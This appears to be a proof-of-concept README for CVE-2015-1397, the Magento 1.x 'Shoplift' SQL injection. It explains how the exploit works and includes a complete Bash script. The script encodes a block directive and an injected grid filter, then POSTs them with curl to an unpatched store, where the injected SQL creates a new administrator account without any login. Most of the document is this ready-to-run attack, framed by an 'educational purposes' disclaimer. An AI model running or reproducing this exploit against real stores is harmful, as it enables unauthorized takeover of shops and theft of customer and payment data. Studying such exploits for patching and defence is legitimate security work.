Related vulnerability
Introduction
# Magento Shoplift Exploit (SUPEE-5344) - CVE-2015-1397
## Overview
This script exploits **CVE-2015-1397**, the SQL injection in Magento 1.x that is the core of the Magento Shoplift exploit (fixed by patch bundle SUPEE-5344). An unauthenticated attacker reaches the `admin/Cms_Wysiwyg/directive/index/` endpoint, has it render the search-report grid, and smuggles SQL statements into the grid's filter; those statements insert a new administrator account directly into the store database.
Originally written in Python by **Manish Kishan Tanwar (error1046)**, this version has been converted to **Bash** with user-friendly input prompts for credentials by **Divine Clown (0xDTC)**.
---
## Features
- **Credential Prompt**: Dynamically prompts for the target URL, admin username, and password.
- **Error Handling**: Provides detailed error messages for invalid inputs, failed network requests, and unexpected server responses.
- **Base64 Encoding**: Encodes payloads dynamically for Magento's processing.
- **Simplified User Experience**: Removes the need for manual payload encoding or static inputs.
---
## Prerequisites
- **Target**: A Magento 1.x installation without SUPEE-5344 (or a later patch bundle that includes it), i.e., one still vulnerable to CVE-2015-1397.
- **Environment**: Linux with `bash`, `curl`, and `base64` utilities installed.
---
## Usage
1. Clone the repository or copy the script to your local system.
2. Make the script executable:
```bash
chmod +x CVE-2015-1397
```
3. Run the script:
```bash
./CVE-2015-1397
```
4. Follow the prompts:
- Enter the **target URL** (e.g., `http://target.com/`).
- Enter the **new admin username**.
- Enter the **new admin password**.
5. If successful, the script will output the newly created admin credentials.
---
## Example
```bash
┌──(kali㉿kali)-[~/example]
└─$ ./CVE-2015-1397
Enter the target URL (e.g., http://target.com/): http://example.com/
Enter the new admin username: admin123
Enter the new admin password: pass123
[*] Sending payload to http://example.com/admin/Cms_Wysiwyg/directive/index/
[+] Exploit successful. Admin account created: admin123 / pass123
```
---
## How It Works
1. **Input Validation**:
- Ensures the provided URL starts with `http://` or `https://`.
- Validates that the username and password are not empty.
2. **Payload Construction**:
- Builds the `___directive` parameter: a Base64-encoded Magento block directive that renders the search-report grid as CSV. The directive itself is fixed; it is only the vehicle that gets the grid rendered.
- Builds the `filter` parameter: a Base64-encoded grid filter whose value closes the generated `WHERE` clause and appends the SQL that inserts the new admin user (in the original exploit, an `admin_user` row plus the matching `admin_role` entry). The username and password entered at the prompt are substituted into this SQL before it is encoded.
3. **Exploitation**:
- Sends a `POST` request to `admin/Cms_Wysiwyg/directive/index/` using `curl`.
- Magento's directive parser renders the block; the grid's filter handling concatenates the attacker-controlled value into its query, so the injected statements run against the store database.
4. **Response Handling**:
- Checks the server's response for indicators of success or failure.
- Handles common errors like invalid URL, empty response, or network issues.
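The procedure above, as an added example that is not the repository's script or the original Python exploit: it builds the three POST fields (`___directive`, `filter`, `forwarded`) in the layout the original Shoplift exploit used, keeps the builders separate from the network step so they can be inspected offline, and only sends the request when run with exactly three arguments. The target URL, the `Firstname`/`Lastname`/`email@example.com` placeholder values, the `rp` salt and the sample credentials are assumptions for the demonstration.

```shell
#!/usr/bin/env bash
# Added example, not the repository's CVE-2015-1397 script.
# Builds the Shoplift POST fields and optionally sends them with curl.
# Placeholder names, the 'rp' salt and the sample credentials are assumptions.
set -eu

# base64 without the line wrap GNU base64 inserts at 76 columns.
b64() { base64 | tr -d '\n'; }

# ___directive: the fixed Magento block directive that renders the
# search-report grid as CSV. The injection does not live here.
build_directive() {
  printf '%s' '{{block type=Adminhtml/report_search_grid output=getCsvFile}}' | b64
}

# SQL appended to the grid query: creates an admin_user row with a
# Magento 1.x password hash (md5(salt . password) ":" salt) and links it
# to the Administrators role (parent_id 1). Single quotes in the inputs
# are doubled so they cannot break the statement we are building.
build_sql() {
  user=$(printf '%s' "$1" | sed "s/'/''/g")
  pass=$(printf '%s' "$2" | sed "s/'/''/g")
  printf '%s' \
    "SET @SALT='rp';" \
    "SET @PASS=CONCAT(MD5(CONCAT(@SALT,'${pass}')),CONCAT(':',@SALT));" \
    "SELECT @EXTRA:=MAX(extra) FROM admin_user WHERE extra IS NOT NULL;" \
    "INSERT INTO admin_user (firstname,lastname,email,username,password,created,modified,logdate,lognum,reload_acl_flag,is_active,extra,rp_token,rp_token_created_at)" \
    " VALUES ('Firstname','Lastname','email@example.com','${user}',@PASS,NOW(),NOW(),NOW(),0,0,1,@EXTRA,NULL,NOW());" \
    "INSERT INTO admin_role (parent_id,tree_level,sort_order,role_type,user_id,role_name)" \
    " VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username='${user}'),'Firstname');"
}

# filter: the grid filter. "field_expr]=0);" closes the WHERE clause the
# grid generates, and everything after it is the injected SQL.
build_filter() {
  printf '%s' "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);$(build_sql "$1" "$2")" | b64
}

# POST the three fields form-encoded to the vulnerable endpoint.
# forwarded=1 is sent as in the original exploit; no admin session is needed.
send_payload() {
  target=$1 user=$2 pass=$3
  curl -sS --max-time 30 \
    --data-urlencode "___directive=$(build_directive)" \
    --data-urlencode "filter=$(build_filter "$user" "$pass")" \
    --data 'forwarded=1' \
    "${target%/}/admin/Cms_Wysiwyg/directive/index/"
}

# Usage: ./shoplift-fields.sh http://target.example/ newadmin 'newpass'
# With any other argument count the script only defines the builders.
if [ "$#" -eq 3 ]; then
  send_payload "$@"
fi
```

Note that nothing in the HTTP response proves the inserts ran: a 200 with a CSV body only shows the grid rendered. The reliable check is the one the README's own script relies on in practice, logging in to `/admin` with the new credentials.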
---
## Error Handling
- **Invalid URL**: Ensures the target URL starts with `http://` or `https://`.
- **Empty Inputs**: Validates that neither username nor password is empty.
- **Network Issues**: Reports if the connection to the target fails.
- **Empty Server Response**: Alerts the user if the server does not return a response.
- **Unsuccessful Exploit**: Displays the server's response for debugging purposes.
---
## Legal Disclaimer
This script is intended for **educational purposes** only. Unauthorized use against systems you do not own or have permission to test is illegal and unethical. The author and contributors are not responsible for any misuse of this tool.
---
## Acknowledgments
Special thanks to:
- Original Python script author: Manish Kishan Tanwar (error1046)
- Security researchers and community contributors for documenting CVE-2015-1397.
---
## References
- [CVE-2015-1397 Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1397)
- [Check Point Research Blog](https://blog.checkpoint.com/)
- [Magento Vulnerability Documentation](https://magento.com/security)
File snapshot
[4.0K] /data/pocs/fdc72a04348f66ba0b1d0571e0493f10c7ba1722
├── [5.4K] CVE-2015-1397
└── [3.6K] README.md
0 directories, 2 files